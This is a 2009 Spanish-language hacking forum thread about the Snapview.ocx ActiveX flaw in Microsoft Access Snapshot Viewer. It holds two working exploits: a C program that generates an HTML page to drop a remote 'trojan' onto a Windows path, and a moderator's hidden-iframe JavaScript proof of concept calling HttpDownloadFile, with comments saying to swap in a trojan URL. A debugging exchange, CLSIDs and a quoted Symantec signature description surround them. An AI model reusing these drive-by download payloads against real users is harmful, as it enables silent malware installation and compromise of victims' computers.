elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Sigue las noticias más importantes de elhacker.net en ttwitter!


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Microsoft Access SnapView.ocx remote exploit (Solucionado)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Microsoft Access SnapView.ocx remote exploit (Solucionado)  (Leído 5,848 veces)
EvilGoblin


Desconectado Desconectado

Mensajes: 2.323


YO NO LA VOTE!


Ver Perfil
Microsoft Access SnapView.ocx remote exploit (Solucionado)
« en: 17 Enero 2009, 04:01 »

http://www.milw0rm.com/exploits/6124


Código:
/* Microsoft Access Snapshot Viewer ActiveX Control Exploit
   Ms-Access SnapShot Exploit Snapview.ocx v 10.0.5529.0
   Download nice binaries into an arbitrary box
   Vulnerability discovered by Oliver Lavery
   http://www.securityfocus.com/bid/8536/info
   Remote: Yes
   greetz to str0ke */

#include <stdio.h>
#include <stdlib.h>


#define Filename        "Ms-Access-SnapShot.html"


FILE *File;
char data[] = "<html>\n<objectclassid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9'id='attack'></object>\n"
              "<script language='javascript'>\nvar arbitrary_file = 'http://path_to_trojan'\n"
              "var dest = 'C:/Docume~1/ALLUSE~1/trojan.exe'\nattack.SnapshotPath = arbitrary_file\n"
              "attack.CompressedPath = destination\nattack.PrintSnapshot(arbitrary_file,destination)\n"
              "<script>\n<html>";

int main ()
{
        printf("**Microsoft Access Snapshot Viewer ActiveX Exploit**\n");
        printf("**c0ded by callAX**\n");
        printf("**r00t your enemy .| **");

        char *b0fer;

        if ( (File = fopen(Filename,"w")) == NULL ) {
                printf("\n fopen() error");
                exit(1);
        }

        b0fer = (char*)malloc(strlen(data));

        fwrite(data, strlen(data), 1,File);
        fclose(File);

        printf("\n\n" Filename " has been created.\n");
        return 0;
}

// milw0rm.com [2008-07-24]


Bien... modifique los parametros... lo compile... me genero el html... lo agrege al access... en una maquina virtual... lo quise correr y me tira error en la pagina....
error en la linea 22   accdp://312......

mi version de SnapView.ocx es inferior al 10.0.5

tengo la 9.x.x
nose si sera ese el problema.. creo q porlomenos tendria q correr bien la pagina

se q en access es facil sin usar exploit.. ya que tengo acceso a visual basic.. basta con un par de rutinas para lograr algo
pero queria prrobarlo en access y luego exportarlo al de Excel q es mas "util"



alguna ayuda?


« Última modificación: 13 Febrero 2009, 10:15 por sirdarckcat » En línea

Experimental Serial Lain [Linux User]
berz3k
Moderador
***
Desconectado Desconectado

Mensajes: 1.199



Ver Perfil
Re: Microsoft Access SnapView.ocx remote exploit [Analysis + PoC]
« Respuesta #1 en: 21 Enero 2009, 08:03 »

EXISTE UN ERROR EN ESTA LINEA:

Código:
char data[] = "<html>\n<objectclassid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9'id='attack'></object>\n"

NO HAY SEPARACION, DESPUES DE "object", prueba para SCRIPT KIDDIES muhahaha EL FIX ES ESTE:

Código:
char data[] = "<html>\n<object classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9'id='attack'></object>\n"


Fixed code by berz3k,
otro codigo sin necesidad de compilar nada.


Código:
<html>
<body>

<!-- Ocultando el frame sobre el .html -->
<div style="visibility:hidden;">

<!-- Exiten otros clsid, probar los adecuados

- F0E42D50-368C-11D0-AD81-00A0C90DC8D9
- F0E42D60-368C-11D0-AD81-00A0C90DC8D9
- F2175210-368C-11D0-AD81-00A0C90DC8D9

-->

<object classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9' id='berz3k'></object>
<script type="text/javascript">

/*
PoC Exploit by berz3k
elhacker.net (c) 2009

*/   

 try{
    var obj = document.getElementById('berz3k');

     <!-- Cambiar el Url Path para descargar algun troyano -->
    var rem = "http://www.google.com.mx/intl/es_mx/images/logo.gif";

    <!-- Cambiar el path destino segun sea el caso -->
    var loc = "C:\elhacker.net\evil.exe";
    obj.HttpDownloadFile(rem,loc);

 }
 catch(err){
       window.alert('Poc failed fuck off\nelhacker.net!!\nBy berz3k (c) 2009');
 }


</script>
</div>
</body>
</html>


|-----------------------------------|
|Para Bajar el Snapshot Viewer|
|-----------------------------------|
http://www.microsoft.com/DOWNLOADS/details.aspx?familyid=B73DF33F-6D74-423D-8274-8B7E6313EDFB&displaylang=en


|-------------------------------------|
|Descarga de Versiones antiguas|
|-------------------------------------|
http://www.boxsoftware.net/descarga.asp?ficha=524652


|----------------------------|
|Componente vulnerable |
|----------------------------|
Snapview.ocx

|---------------------------|
|Descripcion del ataque |
|---------------------------|

La vulnerabilidad que está siendo activamente explotada se debe a un problema en el control ActiveX de Snapshot Viewer para Microsoft Office Access 2000, 2002 y 2003, un atacante puede explotar el problema para ejecutar código arbitrario a través de Internet Explorer cuando el usuario visita una página maliciosamente
creada. Esto le podría permitir obtener los privilegios de la cuenta del usuario local.

|-------------------|
|Lista de archivos|
|-------------------|

De forma predeterminada, Snpvw.exe instala los siguientes archivos en la carpeta Archivos de programa\Snapshot Viewer:

    Leame.txt
    Snapview.cnt
    Snapview.exe
    Snapview.hlp

De forma predeterminada, Snpvw.exe instala los siguientes archivos en la carpeta System:

    Asycfilt.dll
    Comcat.dll
    Hlp95en.dll
    Mfc42.dll
    Msvcrt.dll
    Oleaut32.dll
    Olepro32.dll
    Snapview.ocx
    Stdole2.tlb
    Urlmon.dll
    Wininet.dll


|-----------------------------------|
|Firmas de Symantec donde se|
|especifican los CLSIDs           |
|-----------------------------------|
http://www.symantec.com/business/security_response/attacksignatures/detail.jsp?asid=23034

Severity: High

This attack could pose a serious security threat. You should take immediate action to stop any damage or prevent further damage from happening.

Description

This signature detects an arbitrary-file-download vulnerability in the Snapshot Viewer for Microsoft Access ActiveX Control which may result in the download for malicious application.

Additional Information

Snapshot Viewer for Microsoft Access is an ActiveX control that allows users to view snapshots created with Microsoft Access.

The ActiveX control is prone to a vulnerability that can cause malicious files to be downloaded and saved to arbitrary locations on an affected computer. The ActiveX control can be identified by the following CLSIDs:

- F0E42D50-368C-11D0-AD81-00A0C90DC8D9
- F0E42D60-368C-11D0-AD81-00A0C90DC8D9
- F2175210-368C-11D0-AD81-00A0C90DC8D9

Attackers may exploit this issue to place malicious files at arbitrary locations on a victim's computer. This will facilitate a remote compromise.

Response
Download and install all vendor patches related to this vulnerability.

Algumas Images:

Instalacion SnapShot Viewer & Version OCX vulnerable


-berz3k.











« Última modificación: 21 Enero 2009, 21:36 por berz3k » En línea

EvilGoblin


Desconectado Desconectado

Mensajes: 2.323


YO NO LA VOTE!


Ver Perfil
Re: Microsoft Access SnapView.ocx remote exploit
« Respuesta #2 en: 21 Enero 2009, 11:57 »

q buen informe xDD..

deberias hacer uno asi.. con todos los nuevos errores de Windows?....



Muchisimas Gracias..
En línea

Experimental Serial Lain [Linux User]
berz3k
Moderador
***
Desconectado Desconectado

Mensajes: 1.199



Ver Perfil
Re: Microsoft Access SnapView.ocx remote exploit(Solucionado)
« Respuesta #3 en: 21 Enero 2009, 21:33 »

Código:
q buen informe xDD..
deberias hacer uno asi.. con todos los nuevos errores de Windows?....

Si que lo hago, pero luego me es dificil por el curro y demas cosas, tengo muchos bastante buenos y otros mas inconclusos y aun mas "private" para el trabajo (soy de seguridad), pero somos pocos a los que realmente les interesa el I+D  XDD

thanks a lot-
-berz3k.
« Última modificación: 21 Enero 2009, 21:35 por berz3k » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Remote SAM access
Hacking Avanzado
darkhansolo 3 1,997 Último mensaje 17 Abril 2011, 12:05
por zerocoolcom
Dudas con Routing and Remote Access y redes VPN
Redes
multiplayer1080 4 2,146 Último mensaje 13 Octubre 2011, 01:24
por multiplayer1080
Bucles y arrays en Microsoft Access (VBA)
Programación Visual Basic
Lecram 5 4,137 Último mensaje 31 Enero 2012, 17:50
por MCKSys Argentina
(Solucionado) MP3 a WAV (Microsoft ADPCM)?
Multimedia
Eleкtro 0 1,484 Último mensaje 21 Junio 2012, 10:06
por Eleкtro
[Solucionado]Xp no resulve direcciones microsoft
Redes
Anonymous250 0 382 Último mensaje 23 Junio 2012, 17:13
por Anonymous250
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines